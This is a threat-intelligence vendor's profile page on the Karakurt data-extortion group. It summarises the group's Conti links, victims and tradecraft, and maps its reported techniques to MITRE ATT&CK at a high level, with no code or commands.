Skip to main content
Meet us at Black Hat USA 2026— Las Vegas, August 1–6Book a Meeting
Mallory
Back to threat actors
2 malware families

Karakurt

Also known asKarakurt

Karakurt is a Russian-linked cybercriminal extortion group active since at least mid-2021 and widely described as a data-theft and extortion operation rather than a traditional encryption-focused ransomware group. Multiple sources in the content describe it as an extortion-only or encryption-less operation that compromises company systems, steals data, and demands payment in cryptocurrency under threat of leaking or selling the stolen information. Reported ransom demands ranged from $25,000 to $13 million in Bitcoin. The group operated a public leak site and auction portal, later adding a search capability to make stolen data easier to find and increase pressure on victims. U.S. government reporting cited in the content states Karakurt often contacted victims’ employees, business partners, and clients with harassing emails and phone calls, and published press releases naming non-paying victims. The content repeatedly links Karakurt to the Conti ecosystem. It is described as a data extortion arm, side operation, spin-off, or successor-linked group associated with former Conti members or leaders. Some reporting in the content also states that former Conti members splintered into Karakurt after Conti’s shutdown. Additional reporting cited in the content says the broader organization used multiple extortion brands, including Conti, Karakurt, Royal, TommyLeaks, SchoolBoys Ransomware, and Akira. Observed tradecraft in the content includes initial access via purchased stolen login credentials or access bought from other criminals, including stolen VPN credentials; use of Cobalt Strike, AnyDesk, Mimikatz, PowerShell, 7zip, WinZip, Rclone, FileZilla, and Mega.io; data exfiltration; and extortion without deploying encryption tools. The content also notes Karakurt has used AnyDesk as a persistence mechanism. U.S. government reporting cited in the content states the group often selected victims based on ease of access rather than industry. Victimology in the content shows heavy targeting of North America, with one source stating about 95% of victims published during a 2021 period were based there, while other victims were in Europe. Reported victims and impacts in the content include attacks on healthcare organizations, a pediatric healthcare provider, U.S. government entities including one whose 911 emergency dispatch system was disrupted, the International Centre for Migration Policy Development (ICMPD), and Chattanooga Heart Institute. The content also states Karakurt stole children’s health information in at least one case. Known aliasing and associated names directly mentioned in the content include Karakurt, TommyLeaks, SchoolBoys Ransomware, Royal, Conti, and Akira as brands used by the same broader organization in some reporting. The online alias "Sforza_cesarini" is linked in the content to member Deniss Zolotarjovs, a negotiator associated with Karakurt who was arrested in Georgia, extradited to the United States, and later sentenced in U.S. court.

Share:
Are they targeting you?

Know when an actor pivots toward your sector

Mallory correlates actor tradecraft and target patterns against your stack, your sector, and your geography. See overlap before they land.

Start free trial
MITRE ATT&CK

Tradecraft

19 distinct techniques observed across reporting, grouped by tactic. Hover any cell for the evidence excerpt; click through for MITRE's full description.

11 of 15 tactics27 techniques×N= number of intelligence reports citing this technique
MITRE ATT&CK
TA0043
Reconnaissance
2 techniques
T1589×6
Gather Victim Identity Information
T1598
Phishing for Information
TA0001
Initial Access
2 techniques
T1078×2
Valid Accounts
T1133×2
External Remote Services
TA0002
Execution
1 technique
T1059
Command and Scripting Interpreter
T1059.001
PowerShell
TA0003
Persistence
3 techniques
T1078×2
Valid Accounts
T1133×2
External Remote Services
T1543
Create or Modify System Process
T1543.003×2
Windows Service
TA0004
Privilege Escalation
2 techniques
T1078×2
Valid Accounts
T1543
Create or Modify System Process
T1543.003×2
Windows Service
TA0005
Stealth
1 technique
T1078×2
Valid Accounts
TA0006
Credential Access
1 technique
T1003
OS Credential Dumping
TA0009
Collection
3 techniques
T1005×2
Data from Local System
T1074
Data Staged
T1560
Archive Collected Data
TA0011
Command and Control
2 techniques
T1105
Ingress Tool Transfer
T1219×2
Remote Access Tools
TA0010
Exfiltration
4 techniques
T1020×2
Automated Exfiltration
T1041×3
Exfiltration Over C2 Channel
T1537
Transfer Data to Cloud Account
T1567×6
Exfiltration Over Web Service
T1567.002
Exfiltration to Cloud Storage
TA0040
Impact
2 techniques
T1486×13
Data Encrypted for Impact
T1657×10
Financial Theft
ARSENAL

Associated malware families

2 malware families attributed to this actor across reporting.

FamilyContextEvidenceLast seen
AnyDeskAnyDesk is a popular remote desktop application that allows users to connect to computers and devices remotely... threat actors have been known to utilise AnyDesk's capabilities to control computers, therefore gaining unauthorised access to victims' systems.1Jun 9, 2026
ContiEmsisoft threat analyst Brett Callow previously told The Record that the group has been active since the middle of 2021 and is believed to be a spin-off of the Conti ransomware group. Several other security companies ... have released reports this year showing concrete ties between the infrastructure used by Conti and Karakurt.1May 26, 2026
ACTIVITY FEED

Recent activity

20 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

20 SOURCESView more in app
bleeping computerNews
Jun 12, 2026
Ukrainian national pleads guilty to role in Conti ransomware operation

Named as one of the ransomware groups that former Conti members reportedly splintered into after Conti shut down.

Read more
techtargetNews
Jun 11, 2026
The prosecution gap: Why cybercrimes go unpunished | TechTarget

Cybercrime extortion group referenced in connection with a ransomware negotiator prosecuted by U.S. authorities.

Read more
techcrunch com securityNews
May 6, 2026
DOJ says ransomware gang tapped into Russian government databases | TechCrunch

Ransomware/extortion group accused of targeting more than 54 companies, including U.S. government entities, disrupting 911 dispatch systems, stealing children's health information, and using intimidation tied to alleged access to Russian government databases and law enforcement connections.

Read more
security affairsNews
May 5, 2026
U.S. court sentences Karakurt ransomware negotiator to 8.5 years

Financially motivated cyber extortion group involved in data theft and ransom negotiations, targeting dozens of organizations and extorting victims by threatening to leak stolen data.

Read more
+20 more in the timeline
What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: sector and geo overlap with your footprint, the IOCs they’re burning right now, detection coverage, and what to do next.
Start free trial
Target overlap

Match sector + geo + tech-stack targeting against your real footprint.

Tradecraft mapping19

Every observed MITRE ATT&CK technique, grouped by tactic.

Malware arsenal2

Families this actor is known to deploy, with IOCs and behavior.

Exploited CVEs

CVEs this actor has used in known campaigns.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

Observables

Domains, IPs, and hashes tied to this actor, refreshed continuously.